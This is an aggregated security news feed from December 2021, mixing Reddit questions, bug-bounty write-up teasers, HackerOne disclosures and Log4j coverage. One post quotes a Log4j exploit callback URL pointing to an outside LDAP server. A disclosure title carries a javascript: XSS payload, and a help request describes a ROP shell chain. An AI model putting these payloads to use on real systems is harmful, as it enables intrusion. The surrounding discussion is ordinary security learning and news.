    Hello everyone, soon I will be moving out of my parents' house, and I'm interested in the topic of home networking, security and privacy. Here are my plans: for the last 4 years I've fully switched to GNU/Linux and even switched my phone OS to a privacy respecting one (GrapheneOS). I plan on having a server that will have Jellyfin on it accessed remotely via Caddy (Reverse Proxy), NextCloud as an alternative to Google Drive/Google Photos, and an OpenVPN connection to my home network and PiHole. My main concern is that I would like to build a separate gaming PC that will run Windows; also if I have friends over they would need WiFi. Is it possible to separate my home network into 3 smaller networks with separate SSIDs that won't communicate with each other (basically what I'm asking is, is it possible to have separate networks for guests and me)? ​ I would have some IoT devices such as a smart TV, but is it possible to filter it out in an ACL so that the TV only has LAN but can't connect to the internet? Since I'm moving out it will be a great learning experience to build my home network. Now I have a few questions and I hope some of you lovely people could answer them. Keep in mind I'm focused on privacy and security mostly here. Which router should I go for? Which model is the best, should I go for OpenWRT? Should I get an L3 switch? If so what model would be the best? Is it possible to separate my home network into smaller ones that won't communicate with each other (guest, my personal and IoT LAN devices)? Well that's all the questions I have, thank you in advance. ​ EDIT: I forgot to add this: I would need WiFi, so that means I would need some WiFi Access Points; which models should I look for? submitted by /u/throwaway89722316 [link] [comments]  ( 1 min )
    Should I be worried about non-financial hacks when assessing my security?
    So whenever I analyse my personal security, both cyber and IRL, I always look at my finances and ask "How could a hacker steal any of my funds?", so it usually defaults to me running through my financial accounts and seeing what it would take for a hacker to hack into those accounts and steal the funds. I feel if I run through all the places where my money is and check them off, I should be good, but I wonder - are there other things I should be worried about also? What's the worst that could happen if one of my non-financial accounts is hacked into? submitted by /u/EnterShikariZzz [link] [comments]  ( 3 min )
    Just had my first cyber security interview
    Hi, I am an MIS student who just finished college. Unfortunately I have to do one year of military service; I will be 25 1/2 or 26 when I finish. There is a gap between me as an MIS student and CS students. Thankfully it wasn't as big as I thought. The interviewer liked my Python skills and reversing skills. However he told me I need to strengthen my networking and web skills and told me to study CompTIA A+ and CompTIA Security+. Told me if I want to study malware analysis I should study architecture and OS. The interviewer liked that I am a geek for the most part and although it isn't my major I kept studying security and exploitation. Between the time of my service and now I should start studying networks, web, OS, and architecture. So a couple of questions now. 1- I have an Arduino, can I study OS and architecture from it? 2- He told me to apply again after finishing these courses but cyber security isn't in demand in the labor market of my country yet. So I was thinking of working remotely till then, any advice on that? I was thinking of HackTheBox and ranking up to apply for jobs on there. submitted by /u/Ramseesthe4th [link] [comments]  ( 2 min )
    Currently making 60k CAD in Montreal as a cybersecurity analyst, am I underpaid?
    Hi everyone, I'm currently working as the sole Cybersecurity Analyst for a construction company in Montreal, making 60k per year + 4% bonus. 2 years of experience in IT in general. I'm wondering if I'm currently underpaid? And how much should I expect if I jump ship next year. Thanks. submitted by /u/gateau_a_la_creme [link] [comments]  ( 4 min )
    Why are Port 6666 (irc) and Port 8443 (https-alt) exposed on my wan interface?
    I recently got my hands on a static IP from my ISP and was playing around with nmap when I noticed that both port 6666 and 8443 are open. I never used any kind of software related to IRC. I have a laptop running Ubuntu, an Xbox and 2 iPhones on my network. I think the culprit might be my Asus router as I checked my laptop's firewall setup without any leads. Disabling UPnP doesn't do anything. Should I be worried? Looking up port 6666 brings up a lot of scary sounding results. submitted by /u/Echiketto [link] [comments]  ( 1 min )
  • Open

    Hook Heaps and Live Free
    submitted by /u/dmchell [link] [comments]
    BLISTER malware campaign discovered
    submitted by /u/dmchell [link] [comments]
  • Open

    Cyber Detective OSINT CTF “Life Online” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. I started with the “Life Online” challenges, which… Continue reading on Medium »  ( 4 min )
    A journey inside Amazon's 5-star reviews
    Between intermediaries and data leaks Continue reading on Medium »  ( 3 min )
    How To Hack Any Website
    [Part — 2: Content Discovery] Continue reading on Medium »  ( 3 min )
  • Open

    Wrote a tool to verify whether a simple Java webapp is vulnerable to CVE-2021-44228 given a version of Log4J, Java and possibly some mitigations.
    submitted by /u/One_Explanation_4076 [link] [comments]  ( 1 min )
    RF Bugs and their detection using Software-Defined Radio
    submitted by /u/sebazzen [link] [comments]
    Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-23 Review
    Research on attack attribution based on big data technology by ourren; Java code audit 1: Maven basics by jinxing. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Detecting NTDS.DIT Theft - ESENT Event Logs
    Merry Christmas and Happy Holidays! In this 13Cubed episode, we'll take a look at the value of ESENT Event Logs in detecting potential theft of NTDS.DIT. Episode: https://www.youtube.com/watch?v=rioVumJB0Fo Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    Forensic analysis of an infected image
    I would like to ask: what if I got a USB with an image from someone for analysis and I found that the USB is infected? What should I do to start analyzing it (connect it to my lab (FRED), or install my tools on a VM for analysis, or what)? submitted by /u/ma7moodso7eem [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )
  • Open

    How I Get $1350 From IDOR Just Less 1 hours
    Assalamualaikum, wr,wb , Continue reading on Medium »  ( 2 min )
    Cross-Site Request Forgery — CSRF
    What is Cross-Site Request Forgery ? Continue reading on Medium »  ( 4 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on System Weakness »  ( 2 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on Medium »  ( 1 min )
    AppSec Series 0x04: Crowdsourcing Security
    More than a decade ago, Jeff Howe defined a phenomenon that has gone unnoticed for a long time: “Non professionals contribute to the… Continue reading on The Startup »  ( 6 min )
  • Open

    FreeBuf Morning Report | China's first set of "news digital collectibles" issued; Just Dance user data leaked
    Xinhua News Agency today issued China's first set of "news digital collectible" NFTs.  ( 1 min )
    Analysis of recent attack activity against Bangladesh attributed to the suspected "Donot" APT group
    Donot is an APT group suspected of having a South Asian background; it mainly targets the governments and militaries of neighboring countries including Pakistan, Bangladesh, Nepal, and Sri Lanka.  ( 1 min )
    The "unkillable" "Ghost Miner": analysis report on a Monero mining trojan
    The mining trojan appends a large number of null bytes to the end of its file, inflating its size to hundreds of MB in order to evade antivirus and sandbox detection.  ( 1 min )
    K-12 education apps pose "serious security risks"
    Many of the apps used in K-12 education have various serious security problems, including ones that may lead to student data being shared with advertising companies in an "unregulated and uncontrolled" way.
    The latest US Hack DHS bug bounty program now covers Log4j-related vulnerabilities
    In response to the recently discovered Log4j vulnerability, the department is expanding the scope of the Hack DHS bug bounty program, including additional incentives, to find and patch Log4j-related vulnerabilities in its systems.  ( 1 min )
    Microsoft Teams vulnerability enabling phishing remains unpatched since March
    Microsoft Teams is a chat-based intelligent team collaboration tool that supports document sharing, voice, video conferencing and other instant communication features.  ( 1 min )
    Survey shows that in 60% of engagements, unpatched software with known vulnerabilities let attackers penetrate further
    Data from dozens of penetration tests and security assessments shows that almost every organization can be penetrated by cyber attackers.
  • Open

    [project]Gain Access to the Target System using Trojans
    Lab1 :Gain control over a victim machine using the njRAT RAT Trojan Continue reading on Medium »  ( 1 min )
    Beyond Long4j: A Twitter Spaces Summary
    In the latest Long4j Twitter spaces discussion, @syndrowm from the team at RandoriAttack, Laughing Mantis and MG, led a community-wide… Continue reading on Medium »  ( 2 min )
  • Open

    Logback RCE Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-42550 Comments URL: https://news.ycombinator.com/item?id=29659429 Points: 2 # Comments: 1  ( 3 min )
  • Open

    Hello everyone, question directed at people who have experience working in this field of exploit dev/ reversing
    Do you have to be an expert in other things like web security/pen testing for example? I enjoy doing reversing and finding bugs and exploiting them (still learning) and was wondering if there are other skills that someone needs to be an expert in before landing a job in this field. I do have a lot of the basics down in web security and networking but I've always found those pretty boring and I never really enjoy the process as much as I do reversing and looking for things to exploit in binaries or operating systems. A lot of the security jobs out there tend to be very vague in the job description. I'm not laser focused on getting a job in this field as I'm still a software engineer and do this as a hobby, but if I ever get the opportunity I would gladly take it. submitted by /u/BetaPlantationOwner [link] [comments]  ( 1 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )
  • Open

    Preventing ZAP and Burp Suite from collecting feedback information
    Recently, Callhome, one of ZAP's core add-ons, was updated. Originally Callhome was just a feature built to show News on the main screen, but this update added a telemetry component. Telemetry is a feature for collecting ZAP usage information; according to ZAP, it does not collect vulnerabilities or personal information, only simple statistics. In any case, people who, like me, are sensitive to this kind of data collection will probably need to disable it separately. (Burp Suite has done this for a long time… 😱) Today, while I'm at it, I'm going to write up why ZAP and Burp Suite collect this kind of usage information and how to disable it.
  • Open

    Cache Poisoning DoS on downloads.exodus.com
    Exodus disclosed a bug submitted by youstin: https://hackerone.com/reports/1173153 - Bounty: $2500
    Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack
    HackerOne disclosed a bug submitted by youstin: https://hackerone.com/reports/1181946 - Bounty: $2500
    Cache poisoning Denial of Service affecting assets.gitlab-static.net
    GitLab disclosed a bug submitted by youstin: https://hackerone.com/reports/1160407 - Bounty: $4850
    Cache Poisoning DoS on updates.rockstargames.com
    Rockstar Games disclosed a bug submitted by youstin: https://hackerone.com/reports/1219038 - Bounty: $500
    photo-test.gb.ru ()
    Mail.ru disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1257091
    Rxss on via logout?service=javascript:alert(1)
    U.S. Dept Of Defense disclosed a bug submitted by xko2x: https://hackerone.com/reports/1406598
  • Open

    Tried making a bootable CAINE OS USB from Rufus and balenaEtcher; none of them were bootable. How do you fix the missing partition error?
    submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Collating a Team
    Hi, I'm curating interested parties into a voluntary investigative team using forensic architecture and Bellingcat OSINT techniques to represent data and events which occurred under the Mahamat Said Abdel Kani reign in CAR. I would like to compile a report and subsequent video detailing the key atrocities that were committed under this reign, how they were carried out, and the impact on the victims. This report will hopefully be evidenced to the ICC, but would also be for personal exhibition to all contributors. Message me if you're interested :) submitted by /u/bg0203 [link] [comments]  ( 1 min )
    How do you boot CAINE OS from USB?
    Just downloaded CAINE OS, but caine11.0.iso does not have a boot file; the computer boots into a black screen when booting from USB. submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability: LaTeX is not affected
    Article URL: https://www.latex-project.org/news/2021/12/21/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29656288 Points: 3 # Comments: 0  ( 1 min )
    Azure App Service vulnerability exposed hundreds of source code repositories
    Article URL: https://www.wiz.io/blog/azure-app-service-source-code-leak Comments URL: https://news.ycombinator.com/item?id=29655594 Points: 4 # Comments: 0  ( 5 min )
    Apache Log4j Vulnerability Guidance
    Article URL: https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance Comments URL: https://news.ycombinator.com/item?id=29653370 Points: 1 # Comments: 0  ( 5 min )
    Bug bounty platforms handling thousands of Log4j vulnerability reports
    Article URL: https://portswigger.net/daily-swig/bug-bounty-platforms-handling-thousands-of-log4j-vulnerability-reports Comments URL: https://news.ycombinator.com/item?id=29651771 Points: 1 # Comments: 0  ( 5 min )
    Acronis Vulnerability Scan Reliability
    Is the Acronis vulnerability scan reliable? It detects that my Docker, Python and Apple Music have vulnerabilities. Comments URL: https://news.ycombinator.com/item?id=29648153 Points: 1 # Comments: 0
    Current 0-day vulnerability on FreePBX
    Article URL: https://community.freepbx.org/t/0-day-freepbx-exploit/80092 Comments URL: https://news.ycombinator.com/item?id=29646626 Points: 37 # Comments: 6  ( 6 min )
    Log4j Vulnerability (Log4Shell) Explained – For Java Developers [video]
    Article URL: https://www.youtube.com/watch?v=uyq8yxWO1ls Comments URL: https://news.ycombinator.com/item?id=29643836 Points: 3 # Comments: 0
  • Open

    Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters
    Advanced Reconnaissance and Web Application Discovery RoadMap to Find Massive Vulnerabilities. Continue reading on Medium »  ( 5 min )
    Shopify Plugin Bypass using Client-side injection thru API Implementation Vulnerability
    Hi, I am Kurt Russelle Marmol doing bug hunting for more than a year, and this is my first bug bounty write-up about my findings. Continue reading on Medium »  ( 2 min )
    Learn365 Challenge Review & Year 2021 in a Nutshell
    Learning is an essential factor irrespective of your domain, level of expertise and experience. It helps one to constantly improve their… Continue reading on Medium »  ( 3 min )
    How to be a Bug Bounty Hunter
    Hello guys, in this article I'm going to share some tips on how to become a successful bug hunter. I'm Octavian, a network engineer by day… Continue reading on Medium »
    Share and Win $BUSY!
    Steps to follow: Continue reading on BusyTechnology »
    A guide to our dApp and benefits for our users
    With the launch of our testnet and bugbounty programme, we would like to give our community a brief on our dApp and the various services… Continue reading on Medium »  ( 2 min )
    A Hacker’s Guide to Submitting Bugs on Immunefi
    Many whitehat hackers and bug bounty hunters who discover Immunefi already have some experience under their belt. They’ve often submitted… Continue reading on Immunefi »  ( 8 min )
    How I was able to bypass WAF and find the origin IP and a few sensitive files
    Hello hunters, Continue reading on Medium »  ( 1 min )
    Campaign | Announcing Parami Protocol’s Bug Bounty Program
    Parami is offering $500,000 AD3 for bug hunters! Continue reading on Medium »  ( 2 min )
  • Open

    [Buffer Overflow] Looking for help for a ROP issue
    Hello! ​ I am currently applying (for learning purposes) the following tutorial about a ROP-based buffer overflow inside my Kali VM: https://www.dailysecurity.fr/return_oriented_programming/ ​ However I'm unable to reproduce the same behavior and get a shell... ​ I'm currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault. ​ I'm a beginner and don't feel comfortable with some points: - Is my EIP during the SIGSEGV correct? It looks like it is not in the vmmap ranges (0x7... instead of 0x8...). - Moreover "Leak scanf" has a strange value interpreted as the string "JHmp" - Why are there values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh? - When invoking "Leak system" with "SHELL=/bin/bash", does it work with the prefix "SHELL="? Or does it need another string? - In the comments someone said he had an issue with scanf interpreting space 0x20 but after checking the address I think I'm not concerned. Just maybe "Leak scanf" having 0x0a in the address could generate an error? ​ Could you help me to understand why it doesn't work? I have attached screenshots with values of the stack, registers, etc. to help your understanding (The GDB break is located at the RET of the vuln() function to follow the ROP chain with the overwriting of the "saved eip") ​ Many thanks!! ​ Update: ​ I have updated my libc and it works fine now... Still don't understand why it didn't work before. ​ Screenshots: https://ibb.co/VmGxwC4 https://ibb.co/SPy5jNb https://ibb.co/PmMRbf0 https://ibb.co/3vHkT9Q submitted by /u/Oni_Nephilim [link] [comments]  ( 1 min )
    How do you tolerate how buggy and trash bettercap is?
    Do you just use ettercap-ng? Do the old tools work just as well as bettercap's lame ass does? submitted by /u/master-berator [link] [comments]  ( 1 min )
    Did I find proof of major hack vector possibly? Macbook
    Hi everyone, would like a quick opinion: I suffered a 6 fig hack of multiple crypto wallets in Sept. I was checking the console of my MacBook for any access events or really anything at all just in case, and I saw these logs from August (~7-12 days before the hack on Sept 2nd) that look like a reference to some update and it looks like an iPhone is possibly involved? Not sure. The vector was likely a file on my computer (not online) holding seed phrases. I didn't update my iPhone or connect my iPhone to my MacBook to update at any point during that timeframe as far as I can remember. Is it possible someone on a shared network could use an iPhone to somehow access private files and data on my MacBook? Or otherwise, any idea what these console events could be regarding? I am already working with the US Secret Service on the actual tracking of the stolen crypto funds. We were not able to find the vector of the breach of private data however. Wondering if this is info that is a clue? Imgur Thanks submitted by /u/Intel81994 [link] [comments]  ( 1 min )
    Microsoft Azure Bug Leaks Linux Source Code Repository
    The cloud security vendor Wiz.io discovered a four-year-old bug in the Microsoft Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node that were deployed using "Local Git". The vulnerability, dubbed "NotLegit", has existed since September 2017 and has probably been exploited in the wild. The issue resides in the Azure App Service: when users use the "Local Git" deployment method to deploy to the Azure App Service, the .git folder gets created in the content root, which puts their data and source code at risk of information disclosure. This behavior of Azure App Service via Local Git was known to Microsoft, and the company added a "web.config" file to the .git folder within the public directory that restricted public access. How…  ( 2 min )
    "Find My Phone" went off on my phone, but I didn't activate it??
    Is this a normal thing, or could something weird be going on? I have my own wifi with a custom password. submitted by /u/SeaCommunication11 [link] [comments]  ( 1 min )
    Network Streaming Analytics With IoT
    What threats can be identified with a packet sniffer? submitted by /u/Sangeeth17 [link] [comments]
    What's the main difference in Linux and UNIX? (read post)
    I'm studying Linux systems at university now. And I'm pretty confused about whether Linux and UNIX are two different entities, cuz my college professor seems to use these terms interchangeably and is creating all this massive chaos between these two lol. So I did some research on my own to see the difference but the results were quite confusing at first glance, so now I want y'all to give me the correct answer: are they both the same or different???? submitted by /u/The_Intellectualist [link] [comments]  ( 4 min )
    Log4j: Is the IP in this callback URL known as a serious attacker or just a PoC?
    Imgur won't let me upload a pic, so here's the callback URL I found in an IPS log (dated Dec 11): ldap://45.130.229.168:1389/Exploit This looks a lot like just a copy-pasted log4j PoC. Or has anybody been seriously compromised by this IP? submitted by /u/e_hyde [link] [comments]  ( 1 min )
    Best way to wipe external hard drive securely on windows?
    I still need to use the drive afterwards so physical destruction is not an option. I need to remove the data completely so that recovery software won't be able to recover anything. I don't think just formatting the drive will be enough. I've heard of DBAN but it seems more for internal drives and I'm paranoid that it might accidentally wipe my internal drive instead. submitted by /u/snkhuong [link] [comments]  ( 3 min )
    Network Streaming Analytics With IoT
    Hello everyone, I am requesting you to fill in this survey. It will help me to archive my final year research project. This project is based on developing network streaming analytics in nearly real time with IoT devices. The link is given below. Thanks. https://docs.google.com/forms/d/e/1FAIpQLSeXVeRCn43xodLsY86RK226Nhkq3A0CVS7HLyaaPNOv1VOSeg/viewform?usp=sf_link submitted by /u/Sangeeth17
    Help a newbie understand what's happening with HTTPS & SSL/TLS (question).
    Hello all, I'm a little confused about HTTPS and SSL/TLS. I set up a service and Nginx reverse proxy manager. I have a domain with Cloudflare. I used Let's Encrypt SSL certs when adding the host to my proxy manager. In Cloudflare I'm using the Full SSL/TLS encryption setting. When I go to my service from outside my network it says "not secure" in the toolbar. I asked this question in another sub and was told it was okay, but I looked at Wireshark and was easily able to find my password in clear text :( What exactly is encrypted and when? The service does work over HTTPS, but it also wants me to point it to the PKCS #12 file. I downloaded the certs from proxy manager and am not sure which file to actually upload. I can get help on this question in that service's sub later. Thank you for your help in advance. submitted by /u/Famous_Relative2500
    Do you speak at conferences?
    I'm curious about how people who speak at conferences got into it. I always associated them with senior-level IT execs just trying to sell a product. But I learned that anyone could submit to speak. Those of you that regularly speak at conferences, I'd love to hear more about how you got into it... What year did you start speaking at conferences? What was your first presentation about? What got you into it? Why did you start? What keeps you going with being a presenter? How have your presentations evolved over time? How have you evolved as a speaker over time? What are you presenting on in recent history? Are you speaking in 2022? If yes, what event(s)? submitted by /u/gnomeparadox
    On Writing DFIR Books, pt III
    Editing and Feedback
    When it comes to writing books, having someone you can trust to give you honest, thoughtful, insightful feedback is a huge plus. It can do a lot to boost your confidence and help you deliver a product that you're proud of. When I first started writing books, the process of going from idea to a published book was pretty set...or so I thought, being new and naïve to the whole thing. I put together an idea for a book, and started on an outline; I did this largely because the publisher was asking for things like a "word count". Then they'd send me a questionnaire to complete regarding the potential efficacy of the book, and they'd send my responses to a panel of "experts" within the industry to provide their thoughts and insight. However, there wasn't a great deal of insight i…
    Cross Examination: Unveiling JavaScript injection based browser fingerprint masking attempts
    submitted by /u/ziyahanalbeniz
    Elastic Security disrupts new BLISTER campaign leveraging code signing certificates.
    submitted by /u/expertsnowboarder
    Cloud Web Application Firewall (WAF) CyberRisk Validation Comparative Report
    submitted by /u/markcartertm
    Vulnerabilities in the Abode IOTA security system (fixed as of Dec 17th 2021)
    submitted by /u/jaymzu
    Microsoft Teams: 1 feature, 4 vulnerabilities
    submitted by /u/breakingsystems
    intuitive advanced cryptography [PDF]
    submitted by /u/netfortius
    Responder and IPv6 attacks - Inject a DNS suffix on Active Directory via IPv6 DNSSL
    submitted by /u/Gallus
    Why it's hard to fix the Java ecosystem
    submitted by /u/Jazzlike-Vegetable69
    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,
    Account takeover by tampering the Signup verification token.
    Hello People,
    Accessing Thousands of Covid-19 Patients' Confidential Information. [CVE-2020–35276]
    Hey there, Yash here, I'm a noob BB hunter & security researcher from India.
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I'll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec community recently. I'll…
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    SecWiki News 2021-12-22 Review
    No new articles today. For more recent articles, visit SecWiki.
  • Open

    SecWiki News 2021-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf Morning Report | The 2easy dark web market is dumping stolen data; Joker malware downloaded 500,000 times
    Security researchers found that a dark web market called "2easy" is dumping large volumes of data stolen from roughly 600,000 infected devices.
    Silicon Valley's new get-rich-quick job: crypto startups
    More people are drawn by the spirit of Web3, seeking the decentralization of power and decision-making.
    Livestream recap | The CIS 2021 Spring Edition agenda preview livestream continues
    On the longest night of the winter solstice, nearly ten thousand people tuned in to the FreeBuf livestream room to watch the CIS 2021 Spring Edition agenda preview.
    What should enterprises do when a vulnerability crisis breaks out?
    For security vulnerability incidents, the state has a detailed set of laws and regulations that require relevant enterprises to "report as early as possible" and help enterprises and institutions in the affected industries "patch the gaps" promptly.
    One article to master stack migration
    One article to master stack migration.
    Practical skills: several common methods for troubleshooting domain name resolution failures
    DNS domain name resolution is one of the key steps in accessing a website.
    Dell BIOS update may leave computers unable to boot properly
    A BIOS update recently released by Dell is causing serious boot problems on multiple laptop and desktop models.
    Full text of the "Shanghai Action Plan for Building a Cybersecurity Industry Innovation Hub (2021-2023)" released
    Overall, the Action Plan sets out 4 main goals, 3 major hubs to build, 10 construction tasks, and 7 safeguard measures.
    Security knowledge graph | Mapping a software supply chain knowledge graph to strengthen risk analysis
    The seventh piece in the "Putting Security Knowledge Graphs into Practice, Advancing Together toward Cognitive Intelligence" highlights series explains how knowledge graph technologies are applied in the field of software supply chain security.
    The state of enterprise IoT/OT cybersecurity
    In 2021 there were several high-profile cyberattacks against network equipment, surveillance systems, pipelines, and water treatment facilities, making the need for major improvements in IoT/OT cybersecurity all the more apparent.
    TikTok Live Studio uses OBS source code, violating the GPL
    Recently a Twitter user reported that TikTok's newly launched software, TikTok Live Studio, appears to use source code from OBS (Open Broadcaster Software) without complying with the relevant open source license terms.
    Google warns that more than 35,000 Java packages are affected by the Log4j vulnerability
    Google scanned the Maven Central Java package repository and found 35,863 packages using versions of the Log4j library vulnerable to Log4Shell.
    DNS flood attacks and defenses: an overview and reflections
    Focuses on explaining the attack principles and the defense principles, and offers a reference on how to test.
    SIP protocol message attacks and defenses
    Attack principle: SIP (Session Initiation Protocol) is an application-layer signaling control protocol used to create, modify, and terminate sessions with one or more participants. These sessions can be Internet multimedia conferences, IP telephony, or multime…
    FreeBuf Morning Report | Alibaba Cloud suspended as a partner of the MIIT cybersecurity threat information sharing platform; JPMorgan fined $200 million over employees' use of encrypted messaging apps
    Trouble abounds around the world; the FreeBuf Morning Report keeps you informed on security early.
    Google search tips: keywords alone are not enough; use these 7 techniques to strengthen your search skills
    Reference: https://support.google.com/websearch/answer/2466433
    dead birds
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    large chests
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    [CVE-2021–44855] Blind Stored XSS in VisualEditor media dialog at Wikipedia
    Assalamualaikum Bug Hunter & Hi Everyone

    Can you recommend any tool for packet sniffing with the ability to filter traffic by process?
    It should be a Linux tool (Windows as a last resort). It is desirable that it has the ability to decrypt SSL/TLS. The presence of a GUI will also be a big plus. All I want is to see which processes are sending which traffic. submitted by /u/vend_igo
    Security experts of Reddit: In this paper it is claimed that, for $1400, a device can be constructed that intercepts cellular data. Is this still the case?
    *LTE data specifically Short Long submitted by /u/iExtrapolate314
    How do you curate the learning resources out there for cybersecurity?
    As cybersecurity professionals we always keep learning new things. The best part of the internet is that there are free and paid resources out there and there are many options. The worst part is also that there are so many options. So how do you curate whether a resource (blog/lab like HackTheBox/wordlists/tools) is worth learning from? I have a huge list of resources. I've dipped my toe in to see what fits, but now I'm overwhelmed about where to start because there are too many good resources. submitted by /u/writerlyhacker
    Incident handling/response certs?
    I have mixed feelings about certifications providing any real value, but we have funds for a cert and I'm hoping to find a decent one that goes over the incident response lifecycle for our SOC. SANS is a bit too pricey; curious if anyone has any they would recommend. submitted by /u/freeridevt
    Will attacks such as LLMNR, NBT-NS and mDNS poisoning cause any issue to an internal network?
    I've seen these kinds of attacks are pretty common in any internal pentest tutorial. But is this safe? Will it cause any issue to the customer's network? submitted by /u/w0lfcat
    What is the best way to log DNS when DoH is used?
    I don't have the ability to block DoH because of legal/politics. So what is the best way to get an idea of the DNS name? The only sources I know are: domain names extracted from SSL certificates; Autonomous System lookups combined with maybe the port number; manual DNS lookups. I can't break SSL with a proxy, either. I have no idea what the best way to go about this is, or if there is some other data that can be combined with all of this to make identifying the IP easier. Does anyone know of some options? submitted by /u/greyyit
    Guys, I recently downloaded some photo recovery apps and I'm scared that they might have stolen my photos
    Are most Google Play apps malicious to the extent that they steal photos and sell my privacy? I already installed them and deleted them and now I'm trembling with fear. submitted by /u/WhiteSwordMaster
    ModSecurity: Add custom error page or header to blocked requests
    Hi, using an Nginx ingress, is it possible to add a header or present a custom error page for requests that were blocked by ModSecurity? (Or is it done using the Ingress settings?) submitted by /u/QuickWin1
    [Security Bulletin] Apache HTTP Server fixes multiple security vulnerabilities (CVE-20...
    Recently, Apache HTTP Server released a security update fixing a server-side request forgery (SSRF) and a buffer...
    Ansible Red Hat detector Remote Code Execution – Log4j (CVE-2021-44228)
    Article URL: https://github.com/lucab85/log4j-cve-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29643144 Points: 1 # Comments: 0
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0
    Network Security Trends: August-October 2021
    Network attacks observed August-October 2021 included high levels of cross-site scripting, code execution and directory traversal. The post Network Security Trends: August-October 2021 appeared first on Unit42.
    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh
    Hook Heaps and Live Free
    submitted by /u/jat0369
    Common security issues when configuring HTTPs connections in Android
    submitted by /u/Masrepus
    Android application testing using windows 11 and windows subsystem for android
    submitted by /u/0xdea
    RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
    submitted by /u/parsiya2
    Log4j Vulnerability Explanation In Details
    Everything you need to know about the log4j vulnerability as a hacker!
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu'alaikum (Peace be upon you)
    Inclusion TryHackme
    Hi, amazing hackers. Today I came with another interesting topic, which is local file inclusion. Local File Inclusion is part of OWASP's top 10…
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box.
    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29639132 Points: 1 # Comments: 0
    What is the Log4j vulnerability and should I do anything to protect myself?
    Article URL: https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/ Comments URL: https://news.ycombinator.com/item?id=29638820 Points: 2 # Comments: 0
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0
    Log4j vulnerability: what should boards be asking?
    Article URL: https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking Comments URL: https://news.ycombinator.com/item?id=29635047 Points: 1 # Comments: 0
    Is log4js-node affected by the log4s vulnerability? (no)
